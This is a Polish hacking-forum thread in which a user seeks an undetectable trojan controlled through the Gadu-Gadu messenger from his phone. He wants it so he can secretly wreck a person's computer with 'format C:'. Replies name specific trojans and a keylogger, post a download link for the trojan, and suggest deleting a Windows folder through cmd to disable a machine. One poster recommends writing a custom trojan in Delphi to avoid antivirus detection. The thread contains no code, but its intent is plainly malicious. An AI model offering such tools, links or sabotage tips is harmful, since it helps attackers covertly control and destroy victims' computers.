niewykrywalny z funkcją "format C:" sterowany prze

MarkosWawa

Użytkownik
Dołączył
Grudzień 23, 2005
Posty
7
Witam potrzebyje trojana opartego na protokule GG z funkcją format c: Przeglądałem forum i niestety nic konkretnego nie znalazłem. Może być wersja VIP ale pewna. Ideałem jest Big-Ben GG 2.3 VIP ale obecnie nie do zdobycia.

Pozdrawiam
 

lade

Użytkownik
Dołączył
Styczeń 29, 2007
Posty
480
Wykrywalne sa na trojanyorg.pl czy trojanypl.org, niewykrylwane do tylko VIP ale muisz do autora sie zglosic. Poszukaj na ircu.
 

Citan

Użytkownik
Dołączył
Styczeń 18, 2007
Posty
19
Wiesz ja na wszelki wypadek zachowalem se BB na poczcie.... Jak chcesz go to daj poczte to Ci przesle ;]
 

zbiku19

Użytkownik
Dołączył
Maj 30, 2007
Posty
11
...

[email protected]
<
 

MarkosWawa

Użytkownik
Dołączył
Grudzień 23, 2005
Posty
7
ok ok

Ja wszystko wiem, jednak nic podobnego nie znalazłem. Jak bym znalazł to bym nikomu nie zawracał gitary.

Konkretnie:
1. Sterowany przez GG. (z telefonu kom.) mogę stać przy gościu i mieszać mu w kompie a on nawet sie nie domyśli że to ja
2. Format c: -trwałe uniemożliwienie korzystania z kompa
3. niewykrywalność to już do załatwienia bo jak znajde trojana to dotre do autora i sobie zamówie wersje VIP

Może ktoś coś zaproponuje ciekawego i konkretnego na zasadzie "polecam ci ..... Wiem że jest dobry i ma właśnie te funkcje"
 

lade

Użytkownik
Dołączył
Styczeń 29, 2007
Posty
480
lol ale wymagania.
1. Taka opcje ma VSK 9 keyloger z dodatkowytmi funkcjami)
2. Kazdy trojan z dostepem do cmd i tworzeniem plikow
3. Niekazdy sprzedaje VIP.
 

Citan

Użytkownik
Dołączył
Styczeń 18, 2007
Posty
19
Sorka że nie odpowiadałem....ale ostatnio tylko na chwilke wpadałem na forum, bo mam szkołe, a szukam jeszcze keyloggera, wiec nie zaglądałem do tematu "Trojany"
smile.gif
. Nie bede tyle maili słał, a wiec wrzuciłem BiG BeN GG v2.3 na server:
http://www.speedyshare.com/229181927.html

Życze miłej zabawy. Pozdro!!!
 

Oorus

Użytkownik
Dołączył
Maj 18, 2007
Posty
218
Ja nie rozumiem was... Szybciej nauczycie się delphi które jest raczej proste ;p i sami napiszecie sobie trojana... będzie miał odpowiednie funkcje itp to jest jak wersja VIP :yes:
Przeważnie nowo napisanego trojanka wykrywają tylko ok 3 AV i to jako "podejrzany plik" =]
 

bialkomat

Użytkownik
Dołączył
Listopad 14, 2005
Posty
14
Re: niewykrywalny z funkcją "format C:" sterowany

Originally posted by MarkosWawa
Witam potrzebyje trojana opartego na protokule GG z funkcją format c:

O kurde, ale z Ciebie niezły rzeźnik
<


Żeby zrobić funkcję taką jak format wystarczy zwykły dostęp do CMD, który posiada co drugi trojan (jak ktoś już zresztą wyżej napisał).
Poza tym nie da się przecież zrobić formata partycji systemowej, na której jest właśnie uruchomiony system...
Jak chcesz zrobić komuś naprawdę kuku, czy jak to napisałeś uniemożliwić komuś korzystanie z kompa, wystarczy ze usuniesz np. jakiś windowsowy katalog (również przez cmd).
 

MarkosWawa

Użytkownik
Dołączył
Grudzień 23, 2005
Posty
7
ok wszystko ładnie pięknie tylko że cmd nie odpale z telefonu. Mam SE k 700i i komendy są wysyłane z GG wgranego właśnie na ten telefon. Fajna sprawa ale jak ma być format C: to musi to być jako dostępna komenda a nie CMD. Ponoć big ben GG 2,3 ma możliwość własnie formatowania dysku systemowego ale niestety wersja VIP jest nieosiągalna.
 
Do góry Bottom